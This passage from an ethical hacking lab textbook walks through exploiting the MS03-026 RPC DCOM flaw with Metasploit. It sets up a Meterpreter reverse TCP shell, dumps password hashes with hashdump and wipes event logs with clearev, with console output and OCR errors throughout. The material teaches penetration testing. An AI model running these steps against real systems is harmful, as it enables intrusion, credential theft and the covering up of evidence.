auxiliary/scanner/smb/smb_enumusers_domain normal SMB Domain
User Enumeration
exploit/windows/bright stor/tape_engine 2006 -11-21 average CA BrightStor
ARCserve Tape Engine Buffer


exploit/windows/brightstor/tape_engine 8A 2010 -10-04 average CA BrightStor
ARCserve Tape Engine 0x8A Buffer
exploit/windows/dcerpc/ms03 026 dcom 2003 -07-16 great Microsoft RPC DCOM
Interface Overflow
exploit/windows/dcerpc/ms05_017_msmq 2005 -04-12 good Microsoft Messag e
Queueing Service Path Overflow
exploit/windows/dcerpc/ms07 029 msdns zonename 2007 -04-12 great Microsoft DNS RPC
Service extractQuotedChar()
Overflow (TCP)
exploit/windows/dcerpc/ms07 065 msmq 2007 -12-11 good Microsoft Message
Queueing Service DNS Name Path
exploit/windows/smb/ms04 011 lsass 2004 -04-13 good Microsoft LSASS

DsRolerUpgradeDownlevelServer Overflow
exploit/windows/smb/ms08 067 netapi 2008 -10-28 great Microsoft Server Service
Relative Path Stack

Page 135

Penetration testing using
metasploit and metasplo itable
135 Step 4:
Now that you have the list of RPC exploits in front of you, we would need
more information about the exploit before we actually use it. To get more
informati on regarding the exploit you can use the command, "info
This command provides information such as available targets, exploit
requirements, details of vulnerability itself, and even references where you
can find more information. This is shown in screenshot below,

Step 5:
The command "use " activates the exploit environment for
the exploit . In our case we will use the following
command to activate our exploit
"use exploit/windows/dcerpc/ ms03_026_dcom" * Terminal
File Edit View Terminal Help
msf > info exploit/windows/dcerpc/ms03_026_dcom
Name: Microsoft RPC DCOM Interface Overflow
Module: exploit/windows/dcerpc/ms03_026_dcom
Version: 11545
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
spoonm cazz
Available targets:
Id Name
===== ==========
0 Windows NT SP3 -6a/2000/XP /2003 Universal
Basic options:
Name Current Setting Required Description
====== ============= =========== ==============
RHOST yes The target address
RPORT 135 yes The target port

Payload information:
Space: 880
Avoid: 7 characters
This module exploits a stack buffer overflow i n the RPCSS service, me the more
you are
this vulnerability was originally found by the Last Stage of Delirium research
group and has been widely exploited ever since. This module can exploit the
English versions of Windows NT 4.0 SP3 -6a, Windows 2000, Win dows XP, and
Windows 2003 all in one request :)

Page 136

Ethical Hacking Lab


From the above figure we can see that, after the use of the exploit
command the prompt changes from "msf>" to "msf
exploit(ms03_026_dcom) >" which symbolizes that we have entered a
temporary environment of that exploit.
Step 6:
Now, we need to configure the exploit as per the need of the current
scenario. The "show options" command displays the various parameters
which are required for the exploit to be launched properly. In our case, the
RPORT is already set to 135 and the only option to be set is RHOST
which can be set using the "set RHOST" command.
We enter the command "set RHOST" and we see that
the RHOST is set to
x Terminal
File Edit View Terminal Help
msf exploit (ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
====== ============= =========== ===========
RHOST yes The target address
RPORT 135 yes The target port

Exploit target:
Id Name
0 Windows NT SP3 -6a/2000/XP/2003 Universal
msf exploit (ms03_026_dcom) > se t RHOST
msf exploit (ms03_026_dcom) >
back I track 5

Step 7:
The only step remaining now before we launch the exploit is setting the
payload for the exploit. We can view all the available payloads using the
"show p ayloads" command.
As shown in the below figure, "show payloads" command will list all
payloads that are compatible with the selected exploit.

Page 137

Penetration testing using
metasploit and metasplo itable
137 * Terminal
File Edit View Terminal Help
nsf exploit (ms03_026_dcom) > show payloads
Compatible Payloads
Name Disclosure Date Rank Description ======== ================ ========== =================
generic/debug trap normal Generic x86
Debug Trap
generic/shell bind tcp normal Generic Command
Shell, Bind TCP Inline
generic/shell_reverse tcp normal Generic Command
Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight
windows/adduser normal Windows Execute
net user /ADD
windows/dlli nject/bind nonx_ tcp Reflective Dll
Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind tcp normal Reflective Dll
Injection, Bind TCP Stager (No NX or Wi n7)
windows/dllinject/reverse http: normal Reflective Dll
Injection, Bind TCP Stager
windows/dllinject/reverse ipv6 tcp normal Reflective Dll
Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_nonx_tcp normal Reflective Dll
Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_ord_tcp normal Reflective Dll
Injection, Reverse TCP Stager (No NX or Win7)
windows/dll inject/reverse_ tcp normal Reflective Dll Injection,
Reverse Ordinal TCP Stager (No NX or Win)
windows/dllinject/reverse_tcp_allports normal Reflective Dll
Injection, Reverse TCP Stager
windows/dllinject/rev erse tcp dns normal Reflective Dll Injection,
Reverse All -Port TCP Stager Reflective Dll
Injection, Reverse
TCP Stager (DNS)
windows/d ownload_exec normal Windows Executable
Download and Execute
windows/exec normal Windows Execute
windows/loadlibrary normal Windows LoadLibrary
windows/messagebox normal Windows MessageBox

windows/meterpreter/bind ipv6 tcp normal Windows Meterpreter
(Reflective Injection), Bind TCP Stager (IPv6)

Page 138

Ethical Hacking Lab

138 For our case, we are using the reverse tcp meterpreter which can be set
using the command, "set PAYLOAD
windows/meterpreter/reverse_tcp" which spawns a shell if the remote
server is successfully exploited. Now again you must view the available
options using "show options" to make sure all the compulsory sections are
properly filled so that the exploit is launched properly.
x Terminal
File Edit View Terminal Help
msf exploit (ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ ms03_026_dcom):
Name Required Current Setting Description
======== =========== =============
EXITFUNC thread yes Exit technique:
seh, thread, process, none
LHOST yes The listen
LPORT 4444 yes The listen port

Exploit target:
Id Name
==== ========
0 Windows NT SP3 -6a/2000/XP/2003 Universal
msf exploit (ms03 026 dcom) >

We notice that the LHOST for out payload is not set, so we set it to out
local IP ie. using the command "set LHOST"
Step 8:
Now that everything is ready and the exploit has been configured properly
its time to launch the exploit.
You can use the "check" command to check whether the victim ma chine
is vulnerable to the exploit or not. This option is not present for all the
exploits but can be a real good support system before you actually exploit
the remote server to make sure the remote server is not patched against the
exploit you are trying against it.
In out case as shown in the figure below, our selected exploit does not
support the check option.

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Penetration testing using
metasploit and metasplo itable
139 The "exploit" command actually launches the attack, doing whatever it
needs to do to have the payload executed on the remote system.
File Edit View Terminal Help
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on
[*] Trying target Windows NT SP3 -6a/2000/XP/2003 Universal..
[*] Binding to 4d9f4ab8 -7d1c -11cf-861e -
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.4 2.129[135]
[*] Sending exploit ...
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at 2011 -06-21 00:39:50 +0530
meterpreter >
[*] Bound to 4d9f4ab8 -7d1c -11cf-861e -0020af6e7c57 :0.0@ncacn_ip_tcp: [135] 5

The above figure shows that the exploit was successfully executed against
the remote machine due to the vulnerable port 135.
This is indicated by change in prompt to "meterpreter >".
Step 9:
Now that a reverse connection has been setup between the victim and our
machine, we have complete control of the server. We can use the "help"
command to see which all commands can be used by us on the remote
server to perform the related actions as displayed in the below figure.

Page 140

Ethical Hacking Lab

140 Terminal
File Edit View Terminal Help
meterpreter> ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address :
Netmask :
meterpreter > getuid
Server username: NT AUTHORITY \SYSTEM
meterpreter > hashdump
Intel(R) PRO/1000 MT Network Connection Hardware MAC:
00:0c:29:0b:0b:30 Netmask :
IP Address : backtrack Administrator: 500:16d210d9df536187aad3b435b51404ee: 8d2e9a0f08a790b6f55deble163178bd: ::
Guest:501:aad3b435b5 1404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7
SUPPORT 388945a0?: 1001: aad3b435b51404eeaad3b435b51404ee:
meterpreter > clearev
[*] Wiping 4 records from Application...
[*] Wiping 26 records from System... [* ] Wiping 39 records from Security...
meterpreter >

Below are the results of some of the meterpreter commands.
"ipconfig" prints the remote machines all current TCP/IP network
configuration values
"getuid" prints the server's username to he console.
"hash dump" dumps the contents of the SAM database.
"clearev" can be used to wipe off all the traces that you were ever on the

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Penetration testing using
metasploit and metasplo itable
141 8.4 SUMMARY
Thus we have successfully used Metasploit framework to break into the
remote Windows 2003 server and get shel l access which can be used to
control the remote machine and perform any kind of operations.
Here are potential uses of the Metasploit Framework
● Metasploit can be used during penetration testing to validate the
reports by other automatic vulnerability ass essment tools to prove that
the vulnerability is not a false spositive and can be exploited. Care has
to taken because not only does it disprove false positives, but it can
also breaks things.
● Metasploit can be used to test the new exploits that come up ne arly
everyday on your locally hosted test servers to understand the
effectiveness of the exploit.
● Metasploit is also a great testing tool for your intrusion detection
systems to test whether the IDS is successful in preventing the attacks
that we use to by pass it.
● Metasploit - Popular Penetration Testing Framework
● BackTrack - Dedicated live OS distribution for Penetration Testing.
● Nmap - Free Security Scanner For Network Exploration & Hacking
This article presented high level overview of using Metasploit for
penetration testing with example of exploiting RPC vulnerability in
remote Windows 2003 se rver. Armed with this basic knowledge along
with more research, you can create your own exploits and perform
Penetration Testing like never before.